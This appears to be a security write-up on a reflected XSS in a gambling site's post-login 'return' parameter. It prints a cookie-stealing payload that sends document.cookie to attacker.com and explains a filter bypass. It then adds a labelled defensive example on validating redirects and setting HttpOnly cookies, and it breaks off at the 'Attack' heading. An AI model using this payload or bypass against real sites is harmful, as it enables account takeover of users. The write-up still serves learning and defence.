XSS to Account Takeover
One of the hottest topics in today’s world is the gambling industry. Most of these websites use the same script. Therefore, if one of them is vulnerable, several million users could be at risk!
1 — Recon
To begin with, I examined several pages on the website for vulnerabilities but found nothing conclusive. Then I noticed that the login page was still displayed to me even though I was already logged in. On its own this has no impact and may just be a developer oversight, but what if I could find a vulnerability on this page?
By inspecting the page source, I found a parameter called “return”. This parameter holds the address the user is redirected to after logging in.
2 — Vulnerability
By submitting different test strings in this parameter, I worked out which characters the filter blocks. The next step is to prepare a payload that steals the user's cookies.
3 — Payload & Bypass
To send the cookies to our server we would normally use the following payload, but some of its characters are filtered, so it does not work as-is:
var url = "http://attacker.com/evil.php?cookie=" + document.cookie; document.location = url;
Let’s bypass it:
We cannot append the cookies to the URL because the plus sign (+) is filtered.
How do we bypass it?
Split the URL into two parts (the attacker server address and the cookie string), then join them into a new variable with the string “concat” method instead of the plus sign.
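From the defender's side, this chain only works because the “return” value is reflected into the page unencoded and the session cookie is readable from script. The following is an added example, not code from the write-up or from the affected site, showing how a login page could validate that parameter and encode it before reflecting it; the function names, the fallback path and the site origin are assumptions.

```javascript
// Added example (not the affected site's code): validate a post-login "return"
// parameter so only same-site relative paths survive, and HTML-encode it
// before it is written back into the page. Names and origin are assumed.
const SITE_ORIGIN = "https://example-site.test"; // assumed origin

function htmlEncode(value) {
  // Numeric-entity encode every character that can break out of an
  // attribute value or text node, so no reflected "><script> survives.
  return String(value).replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

function safeReturnPath(raw, fallback = "/account") {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 512) return fallback;
  let value;
  try {
    value = decodeURIComponent(raw); // unwrap a URL-encoded value first
  } catch {
    return fallback;                 // malformed percent-encoding
  }
  // Control characters and backslashes are rejected outright (browsers
  // normalise "\" to "/" in URLs, which defeats simple prefix checks).
  if (/[\u0000-\u001f\\]/.test(value)) return fallback;
  // Must be a relative path: "http://...", "javascript:..." and the
  // protocol-relative "//attacker" form all fail this check.
  if (!value.startsWith("/") || value.startsWith("//")) return fallback;
  // Resolve against the fixed origin and confirm it did not escape it.
  let parsed;
  try {
    parsed = new URL(value, SITE_ORIGIN);
  } catch {
    return fallback;
  }
  if (parsed.origin !== SITE_ORIGIN) return fallback;
  return parsed.pathname + parsed.search; // drop any fragment
}

function renderReturnField(raw) {
  // Even the validated value is encoded at the point of reflection.
  const safe = htmlEncode(safeReturnPath(raw));
  return `<input type="hidden" name="return" value="${safe}">`;
}

function sessionCookieHeader(token) {
  // HttpOnly keeps the session cookie out of document.cookie, so the
  // exfiltration payload discussed above would have nothing to read.
  return `session=${encodeURIComponent(token)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}
```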
4 — Attack